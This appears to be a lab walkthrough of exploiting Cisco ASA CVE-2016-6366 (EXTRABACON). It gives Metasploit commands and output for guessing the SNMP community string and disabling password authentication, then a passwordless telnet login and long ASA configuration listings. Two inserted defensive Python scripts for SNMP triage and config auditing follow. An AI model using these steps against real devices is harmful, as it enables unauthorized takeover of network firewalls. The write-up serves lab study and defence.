Authors: < nixawk >


Cisco ASA - CVE-2016-6366

A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.

The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.

Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.

Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory.

How to log in to Cisco ASA?

If you know nothing about the Cisco ASA device, first try to discover something useful with nmap or custom tools and methods.

If SNMP is enabled, we can try to guess the community string with Metasploit's snmp_login module.

msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > run

[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
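The advisory above says the attack needs a known community string plus crafted SNMP packets, and the snmp_login run shows the string being guessed. As an added example that is not part of this page, of Cisco's code or of the exploit, here is a triage routine that parses SNMPv1/v2c requests and flags the two things a defender can watch for on the wire: a default community string and an OID far longer than any MIB object. The 64-sub-identifier threshold is an assumption, and the sample packets are constructed with the small BER encoder at the bottom.

```python
"""SNMPv1/v2c request triage: flags default community strings and oversized OIDs.
Added example, not Cisco's code nor the exploit; sample packets are constructed."""
from collections import namedtuple

DEFAULT_COMMUNITIES = {"public", "private"}  # what snmp_login guesses first
MAX_OID_SUBIDS = 64  # assumed threshold; real MIB OIDs have far fewer sub-ids
SnmpRequest = namedtuple("SnmpRequest", "version community pdu_tag oids")

def _read_tlv(buf, pos):
    """Parse one BER TLV at pos; return (tag, contents, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long-form length: low 7 bits give the byte count
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _decode_oid(raw):
    """Decode BER OID contents (base-128, high bit = continuation) to sub-ids."""
    subids, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            subids.append(value)
            value = 0
    return subids

def parse_snmp(packet):
    """Parse SNMPv1/v2c: SEQUENCE { version, community, PDU { ..., varbinds } }."""
    _, msg, _ = _read_tlv(packet, 0)
    _, ver, p = _read_tlv(msg, 0)
    _, community, p = _read_tlv(msg, p)
    pdu_tag, pdu, _ = _read_tlv(msg, p)  # 0xA0 Get, 0xA1 GetNext, 0xA5 GetBulk
    p = 0
    for _ in range(3):  # request-id, error-status, error-index (or bulk params)
        _, _, p = _read_tlv(pdu, p)
    _, varbinds, _ = _read_tlv(pdu, p)
    oids, p = [], 0
    while p < len(varbinds):
        _, vb, p = _read_tlv(varbinds, p)
        _, oid_raw, _ = _read_tlv(vb, 0)  # first element of a VarBind is its OID
        oids.append(_decode_oid(oid_raw))
    return SnmpRequest(int.from_bytes(ver, "big"), community.decode(), pdu_tag, oids)

def triage(packet):
    """Return findings for one SNMP request; an empty list means unremarkable."""
    req = parse_snmp(packet)
    findings = []
    if req.community in DEFAULT_COMMUNITIES:
        findings.append(f"default community string '{req.community}'")
    for oid in req.oids:
        if len(oid) > MAX_OID_SUBIDS:
            findings.append(f"oversized OID ({len(oid)} sub-identifiers)")
    return findings

def _tlv(tag, content):
    """Minimal BER encoder used only to construct the sample packets."""
    n = len(content)
    length = bytes([n]) if n < 0x80 else bytes([0x82]) + n.to_bytes(2, "big")
    return bytes([tag]) + length + content

def _encode_oid(subids):
    out = bytearray([subids[0] * 40 + subids[1]])
    for s in subids[2:]:
        chunk = [s & 0x7F]
        while s := s >> 7:
            chunk.insert(0, 0x80 | (s & 0x7F))
        out += bytes(chunk)
    return bytes(out)

def build_request(community, oid, pdu_tag=0xA0):
    """Constructed SNMPv2c request carrying one varbind (NULL value) for oid."""
    varbind = _tlv(0x30, _tlv(0x06, _encode_oid(oid)) + b"\x05\x00")
    header = b"\x02\x01\x01\x02\x01\x00\x02\x01\x00"  # request-id 1, no error
    pdu = _tlv(pdu_tag, header + _tlv(0x30, varbind))
    return _tlv(0x30, b"\x02\x01\x01" + _tlv(0x04, community.encode()) + pdu)
```

Feed `triage` the UDP payload of each inbound packet to port 161 (for example from a pcap) and alert on any non-empty result.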

Now CVE-2016-6366 can be used to exploit the remote Cisco device.

msf auxiliary(cisco_asa_extrabacon) > show options

Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
   RETRIES    1                yes       SNMP Retries
   RHOST      192.168.206.114  yes       The target address
   RPORT      161              yes       The target port
   TIMEOUT    1                yes       SNMP Timeout

msf auxiliary(cisco_asa_extrabacon) > run

[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed

If the exploit succeeds, try to log in with telnet. The attacker can log in to the Cisco device without a password.

$ telnet 192.168.206.114
ciscoasa> ?

  clear       Reset functions
  enable      Turn on privileged commands
  exit        Exit from the EXEC
  help        Interactive help for commands
  login       Log in as a particular user
  logout      Exit from the EXEC
  no          Negate a command or set its defaults
  ping        Send echo messages
  quit        Exit from the EXEC
  show        Show running system information
  traceroute  Trace route to destination

How to check the Cisco version?

ciscoasa> show version

Cisco Adaptive Security Appliance Software Version 9.2(1)
Device Manager Version 7.2(1)

Compiled on Thu 24-Apr-14 12:14 PDT by builders
System image file is "boot:/asa921-smp-k8.bin"
Config file at boot was "startup-config"

ciscoasa up 2 hours 25 mins

Hardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
Internal ATA Compact Flash, 256MB
Slot 1: ATA Compact Flash, 8192MB
BIOS Flash Firmware Hub @ 0x1, 0KB


 0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10
 1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5
 2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9
 3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10

ASAv Platform License State: Unlicensed
*Install -587174176 vCPU ASAv platform license for full functionality.
The Running Activation Key is not valid, using default settings:

Licensed features for this platform:
Virtual CPUs                      : 0              perpetual
Maximum Physical Interfaces       : 10             perpetual
Maximum VLANs                     : 50             perpetual
Inside Hosts                      : Unlimited      perpetual
Failover                          : Active/Standby perpetual
Encryption-DES                    : Enabled        perpetual
Encryption-3DES-AES               : Enabled        perpetual
Security Contexts                 : 0              perpetual
GTP/GPRS                          : Disabled       perpetual
AnyConnect Premium Peers          : 2              perpetual
AnyConnect Essentials             : Disabled       perpetual
Other VPN Peers                   : 250            perpetual
Total VPN Peers                   : 250            perpetual
Shared License                    : Disabled       perpetual
AnyConnect for Mobile             : Disabled       perpetual
AnyConnect for Cisco VPN Phone    : Disabled       perpetual
Advanced Endpoint Assessment      : Disabled       perpetual
UC Phone Proxy Sessions           : 2              perpetual
Total UC Proxy Sessions           : 2              perpetual
Botnet Traffic Filter             : Enabled        perpetual
Intercompany Media Engine         : Disabled       perpetual
Cluster                           : Disabled       perpetual

This platform has an ASAv VPN Premium license.

Serial Number: 9ATJDXTHK3B
Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000

Image type          : Release
Key version         : A

Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

How to enter privileged mode?

enable enters privileged EXEC mode, from which configure terminal enters configuration mode. By default the enable password is empty.

ciscoasa> help enable

USAGE:

    enable [<priv_level>]

DESCRIPTION:

enable      Turn on privileged commands

ciscoasa> enable ?

  <0-15>  Enter optional privilege level (0-15)
  <cr>

ciscoasa> enable
Password:
ciscoasa# configure terminal
ciscoasa(config)# ?

    aaa                           Enable, disable, or view user authentication,
                                  authorization and accounting
    aaa-server                    Configure a AAA server group or a AAA server
    access-group                  Bind an access-list to an interface to filter
                                  traffic
    access-list                   Configure an access control element
    arp                           Change or view ARP table, set ARP timeout
                                  value, view statistics
    as-path                       BGP autonomous system path filter
    asdm                          Configure Device Manager
    asp                           Configure ASP parameters
    auth-prompt                   Customize authentication challenge, reject or
                                  acceptance prompt
    auto-update                   Configure Auto Update
    banner                        Configure login/session banners
    bgp-community                 format for BGP community
    boot                          Set system boot parameters
    ca                            Certification authority
    call-home                     Smart Call-Home Configuration
    checkheaps                    Configure checkheap verification intervals
    class-map                     Configure MPF Class Map
    clear                         Clear
    client-update                 Configure and change client update parameters
    clock                         Configure time-of-day clock
    cluster                       Cluster configuration
    command-alias                 Create command alias
    community-list                Add a community list entry
    compression                   Configure global Compression parameters
    configure                     Configure using various methods
    console                       Serial console functions
    coredump                      Configure Coredump options
    crashinfo                     Enable/Disable writing crashinfo to flash
    crypto                        Configure IPSec, ISAKMP, Certification
                                  authority, key
    ctl-file                      Configure a ctl-file instance
    ctl-provider                  Configure a CTL Provider instance
    cts                           Cisco Trusted Security commands
    ddns                          Configure dynamic DNS update method
    dhcp-client                   Configure parameters for DHCP client operation
    dhcpd                         Configure DHCP Server
    dhcprelay                     Configure DHCP Relay Agent
    dns                           Add DNS functionality to an interface
    dns-group                     Set the global DNS server group
    dns-guard                     Enforce one DNS response per query
    domain-name                   Change domain name
    dynamic-access-policy-record  Dynamic Access Policy configuration commands
    dynamic-filter                Configure Dynamic Filter
    dynamic-map                   Configure crypto dynamic map
    enable                        Configure password for the enable command
    end                           Exit from configure mode
    established                   Allow inbound connections based on established
                                  connections
    event                         Configure event manager
    exit                          Exit from config mode
    failover                      Enable/disable failover feature
    filter                        Enable or disable URL, FTP, HTTPS, Java, and
                                  ActiveX filtering
    fips                          FIPS 140-2 compliance information
    firewall                      Switch to router/transparent mode
    fixup                         Add or delete inspection services
    flow-export                   Configure flow information export through
                                  NetFlow
    fragment                      Configure the IP fragment database
    ftp                           Set FTP mode
    ftp-map                       Configure advanced options for FTP inspection
    group-delimiter               The delimiter for tunnel-group lookup.
    group-policy                  Configure or remove a group policy
    gtp-map                       Configure advanced options for GTP inspection
    h225-map                      Configure advanced options for H225 inspection
    help                          Interactive help for commands
    hostname                      Change host name of the system
    hpm                           Configure TopN host statistics collection
    http                          Configure http server and https related
                                  commands
    http-map                      This command has been deprecated.
    icmp                          Configure access rules for ICMP traffic
    imap4s                        Configure the imap4s service
    interface                     Select an interface to configure
    ip                            Configure IP address pools
    ip                            Configure IP addresses, address pools, IDS, etc
    ipsec                         Configure transform-set, IPSec SA lifetime and
                                  PMTU Aging reset timer
    ipv6                          Configure IPv6 address pools
    ipv6                          Global IPv6 configuration commands
    ipv6-vpn-addr-assign          Global settings for VPN IP address assignment
                                  policy
    isakmp                        Configure ISAKMP options
    jumbo-frame                   Configure jumbo-frame support
    key                           Create various configuration keys
    l2tp                          Configure Global L2TP Parameters
    ldap                          Configure LDAP Mapping
    logging                       Configure logging levels, recipients and other
                                  options
    logout                        Logoff from config mode
    mac-address                   MAC address options
    mac-list                      Create a mac-list to filter based on MAC
                                  address
    management-access             Configure management access interface
    map                           Configure crypto map
    media-termination             Configure a media-termination instance
    mgcp-map                      Configure advanced options for MGCP inspection
    migrate                       Migrate IKEv1 configuration to IKEv2/SSL
    monitor-interface             Enable or disable failover monitoring on a
                                  specific interface
    mount                         Configure a system mount
    mroute                        Configure static multicast routes
    mtu                           Specify MTU(Maximum Transmission Unit) for an
                                  interface
    multicast-routing             Enable IP multicast
    name                          Associate a name with an IP address
    names                         Enable/Disable IP address to name mapping
    nat                           Associate a network with a pool of global IP
                                  addresses
    no                            Negate a command or set its defaults
    ntp                           Configure NTP
    nve                           Configure an Network Virtulization Endpoint
                                  (NVE)
    object                        Configure an object
    object-group                  Create an object group for use in
                                  'access-list', etc
    object-group-search           Enables object group search algorithm
    pager                         Control page length for pagination
    passwd                        Change Telnet console access password
    password                      Configure password encryption
    password-policy               Configure password policy options
    phone-proxy                   Configure a Phone proxy instance
    pim                           Configure Protocol Independent Multicast
    policy-list                   Define IP Policy list
    policy-map                    Configure MPF Parameter Map
    pop3s                         Configure the pop3s service
    prefix-list                   Build a prefix list
    priority-queue                Enter sub-command mode to set priority-queue
                                  attributes
    privilege                     Configure privilege levels for commands
    prompt                        Configure session prompt display
    quit                          Exit from config mode
    quota                         Configure quotas
    regex                         Define a regular expression
    remote-access                 Configure SNMP trap threshold for VPN
                                  remote-access sessions
    route                         Configure a static route for an interface
    route-map                     Create route-map or enter route-map
                                  configuration mode
    router                        Enable a routing process
    same-security-traffic         Enable same security level interfaces to
                                  communicate
    scansafe                      Scansafe configuration
    service                       Configure system services
    service-interface             service-interface for dynamic interface types
    service-policy                Configure MPF service policy
    setup                         Pre-configure the system
    sla                           IP Service Level Agreement
    smtp-server                   Configure default SMTP server address to be
                                  used for Email
    smtps                         Configure the smtps service
    snmp                          Configure the SNMP options
    snmp-map                      Configure an snmp-map, to control the operation
                                  of the SNMP inspection
    snmp-server                   Modify SNMP engine parameters
    ssh                           Configure SSH options
    ssl                           Configure SSL options
    sunrpc-server                 Create SUNRPC services table
    sysopt                        Set system functional options
    tcp-map                       Configure advanced options for TCP inspection
    telnet                        Add telnet access to system console or set idle
                                  timeout
    terminal                      Set terminal line parameters
    tftp-server                   Configure default TFTP server address and
                                  directory
    threat-detection              Show threat detection information
    time-range                    Define time range entries
    timeout                       Configure maximum idle times
    tls-proxy                     Configure a TLS proxy instance or the maximum
                                  sessions
    track                         Object tracking configuration commands
    tunnel-group                  Create and manage the database of connection
                                  specific records for IPSec connections
    tunnel-group-map              Specify policy by which the tunnel-group name
                                  is derived from the content of a certificate.
    uc-ime                        Configure a Cisco Intercompany Media Engine
                                  (UC-IME) instance
    url-block                     Enable URL pending block buffer and long URL
                                  support
    url-cache                     Enable/Disable URL caching
    url-server                    Configure a URL filtering server
    user-identity                 Configure user-identity firewall
    username                      Configure user authentication local database
    virtual                       Configure address for authentication virtual
                                  servers
    vnmc                          Configure VNMC params
    vpdn                          Configure VPDN feature
    vpn                           Configure VPN parameters.
    vpn-addr-assign               Global settings for VPN IP address assignment
                                  policy
    vpn-sessiondb                 Configure the VPN Session Manager
    vpnsetup                      Configure VPN Setup Commands
    vxlan                         Configure VXLAN system parameters
    wccp                          Web-Cache Coordination Protocol Commands
    webvpn                        Configure the WebVPN service
    xlate                         Configure an xlate option
    zonelabs-integrity            ZoneLabs integrity Firewall Server
                                  Configuration

How to configure a Cisco interface?

ciscoasa(config)# interface ?

configure mode commands/options:
  GigabitEthernet  GigabitEthernet IEEE 802.3z
  Management       Management interface
  Redundant        Redundant Interface
  TVI              Tenant Virtual Interface
  vni              VNI Interface
  <cr>

ciscoasa(config)# interface GigabitEthernet ?

configure mode commands/options:
  <0-0>  GigabitEthernet interface number

ciscoasa(config)# interface GigabitEthernet 0/?

configure mode commands/options:
  <0-2>  GigabitEthernet interface number

ciscoasa(config)# interface GigabitEthernet 0/0

How to set an IP address?

ciscoasa(config-if)# ?

Interface configuration commands:
  authentication   authentication subcommands
  ddns             Configure dynamic DNS
  default          Set a command to its defaults
  delay            Specify interface throughput delay
  description      Interface specific description
  dhcp             Configure parameters for DHCP client
  dhcprelay        Configure DHCP Relay Agent
  duplex           Configure duplex operation
  exit             Exit from interface configuration mode
  flowcontrol      Configure flowcontrol operation
  hello-interval   Configures EIGRP-IPv4 hello interval
  help             Interactive help for interface subcommands
  hold-time        Configures EIGRP-IPv4 hold time
  igmp             IGMP interface commands
  ip               Configure the ip address
  ipv6             IPv6 interface subcommands
  mac-address      Assign MAC address to interface
  management-only  Dedicate an interface to management. Block thru traffic
  mfib             Interface Specific MFIB Control
  multicast        Configure multicast routing
  nameif           Assign name to interface
  no               Negate a command or set its defaults
  ospf             OSPF interface commands
  pim              PIM interface commands
  pppoe            Configure parameters for PPPoE client
  rip              Router Information Protocol
  security-level   Specify the security level of this interface after this
                   keyword, Eg: 0, 100 etc. The relative security level between
                   two interfaces determines the way the Adaptive Security
                   Algorithm is applied. A lower security_level interface is
                   outside relative to a higher level interface and equivalent
                   interfaces are outside to each other
  shutdown         Shutdown the selected interface
  speed            Configure speed operation
  split-horizon    Configures EIGRP-IPv4 split-horizon
  summary-address  Configures EIGRP-IPv4 summary-address
ciscoasa(config-if)# ip address ?

interface mode commands/options:
  Hostname or A.B.C.D  Firewall's network interface address
  dhcp                 Keyword to use DHCP to poll for information. Enables the
                       DHCP client feature on the specified interface
  pppoe                Keyword to use PPPoE to poll for information. Enables
                       the PPPoE client feature on the specified interface
ciscoasa(config-if)# ip address 192.168.206.114 255.255.255.0
ciscoasa(config-if)# no shutdown
ciscoasa(config-if)# exit
ciscoasa(config)# exit
ciscoasa# ping 192.168.206.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

How to enable the SNMP service?

ciscoasa# configure terminal
ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public

How to enable the SSH service?

ciscoasa# configure terminal
ciscoasa(config)# username admin password password
ciscoasa(config)# aaa authentication ssh console LOCAL
ciscoasa(config)# passwd password
ciscoasa(config)# crypto key generate rsa ?

configure mode commands/options:
  general-keys  Generate a general purpose RSA key pair for signing and
                encryption
  label         Provide a label
  modulus       Provide number of modulus bits on the command line
  noconfirm     Specify this keyword to suppress all interactive prompting.
  usage-keys    Generate seperate RSA key pairs for signing and encryption
  <cr>
ciscoasa(config)# crypto key generate rsa modulus ?

configure mode commands/options:
  1024  1024 bits
  2048  2048 bits
  4096  4096 bits
  512   512 bits
  768   768 bits

ciscoasa(config)# ssh 192.168.206.1 255.255.255.0 inside
ciscoasa(config)# ssh 192.168.206.137 255.255.255.0 inside
ciscoasa(config)# ssh version 2

How to enable the Telnet service?

ciscoasa# configure terminal
ciscoasa(config)# aaa authentication telnet console LOCAL
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
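The SNMP, SSH and Telnet sections above are exactly the settings a defender should audit on an ASA: a default community string, telnet open to every source, a trivial local password. As an added example (not Cisco's tooling and not from this page's author), here is a small audit that runs over the lab commands shown above and over an assumed hardened variant; the hardened lines, including the SNMPv3 host syntax, are assumptions and not taken from the page.

```python
"""Audit an ASA configuration excerpt for the management-plane settings that the
SNMP, SSH and Telnet sections above turn on. Added example, not Cisco's tooling;
LAB_CONFIG is built from the page's commands, HARDENED_CONFIG is an assumed variant."""
import re

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
DEFAULT_COMMUNITIES = ("public", "private")

def audit_asa_config(config):
    """Return (config line, finding) pairs; an empty list means nothing flagged."""
    lines = [ln.strip() for ln in config.splitlines() if ln.strip()]
    findings = []
    for ln in lines:
        # snmp-server community <s>  or  snmp-server host <if> <ip> community [0] <s>
        m = re.match(r"snmp-server (?:host \S+ \S+ )?community (?:0 )?(\S+)", ln)
        if m and m.group(1).lower() in DEFAULT_COMMUNITIES:
            findings.append((ln, "default SNMP community string"))
        if re.match(rf"telnet {IP} {IP} \S+", ln):
            findings.append((ln, "telnet management access (cleartext)"))
        m = re.match(r"(ssh|telnet) 0\.0\.0\.0 0\.0\.0\.0 \S+", ln)
        if m:
            findings.append((ln, f"{m.group(1)} reachable from any source address"))
        m = re.match(r"username (\S+) password (\S+)", ln)
        if m and m.group(2).lower() in (m.group(1).lower(), "password"):
            findings.append((ln, "trivial local password"))
    if any(re.match(rf"ssh {IP} ", ln) for ln in lines) and "ssh version 2" not in lines:
        findings.append(("ssh", "ssh version 2 not enforced"))
    return findings

# Constructed from the commands shown on this page.
LAB_CONFIG = """
username admin password password
aaa authentication ssh console LOCAL
aaa authentication telnet console LOCAL
snmp-server host inside 192.168.206.1 community 0 public
ssh 192.168.206.1 255.255.255.0 inside
ssh version 2
telnet 0.0.0.0 0.0.0.0 inside
"""

# Assumed hardened variant (not from the page): SNMPv3 user instead of a
# community string, no telnet, SSH from a single host. Verify the exact
# snmp-server host syntax against the ASA release in use.
HARDENED_CONFIG = """
username admin password Str0ng-Passphrase-Example
aaa authentication ssh console LOCAL
snmp-server host inside 192.168.206.1 version 3 snmpadmin
ssh 192.168.206.1 255.255.255.255 inside
ssh version 2
"""

if __name__ == "__main__":
    for line, why in audit_asa_config(LAB_CONFIG):
        print(f"{why}: {line}")
```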

Links

  1. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
  2. http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/118075-configure-asa-00.html
  3. https://github.com/RiskSense-Ops/CVE-2016-6366/
  4. http://paper.seebug.org/31/